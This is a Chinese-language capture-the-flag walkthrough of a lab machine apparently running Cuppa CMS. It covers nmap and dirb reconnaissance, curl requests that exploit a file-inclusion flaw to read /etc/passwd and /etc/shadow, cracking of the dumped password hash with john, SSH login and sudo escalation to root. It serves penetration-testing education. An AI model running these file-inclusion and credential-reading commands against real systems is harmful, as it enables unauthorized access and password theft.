實戰記錄
1、nmap資訊列舉
1)C段掃描
nmap -sP 192.168.186.0/24
2)掃描全埠資訊
nmap -p- 192.168.186.143
3)掃描版本資訊
nmap -p- 192.168.186.143 -sS -sV -A -T5
有用的資訊:
2、目錄爆破
dirb http://192.168.186.143/
查詢出該頁面存在administrator目錄:
http://192.168.186.143/administrator/installation/
發現是Title[Cuppa CMS]框架!CuppaCMS是一套內容管理系統(CMS)!
3、谷歌搜尋:Cuppa CMS exploit
https://www.exploit-db.com/exploits/25971
其實是個檔案包含漏洞,請求中的urlConfig的引數會當做程式碼執行(原來這種也能申請CVE,驚呆。。。)
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
嘗試通過get拼接,無回顯,因此改用post方式,因為漏洞是
$_REQUEST,兩種方式都是接收的。
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.186.143/administrator/alerts/alertConfigField.php
發現存在正確回顯,說明驗證檔案包含漏洞成功
接下來就讀取shadow裡面的資訊,因為裡面有登陸的密碼
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.
168.186.143/administrator/alerts/alertConfigField.php
在回顯中找最長的,因為裡面是包含有密碼,比如說這個
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
儲存下
使用john來暴力破解密碼,不加密碼本就是用的本地預設密碼本
使用者名稱:w1r3s
密碼:computer
然後進行ssh登陸目標主機
ssh w1r3s@192.168.186.143
然後繼續進行linux掃描,這裡用工具linpeas.sh,然後通過wget傳輸
控制端
目標端
執行掃描檔案
可利用的地方是橙色顯示,這裡發現可能可以通過sudo提權
根據提示使用sudo -l,發現許可權都是可以使用的
進一步使用sudo su去提權,發現成功了
獲取flag成功
擴充套件知識
1,定位問題函式
2,控制/etc/sudoers的最低許可權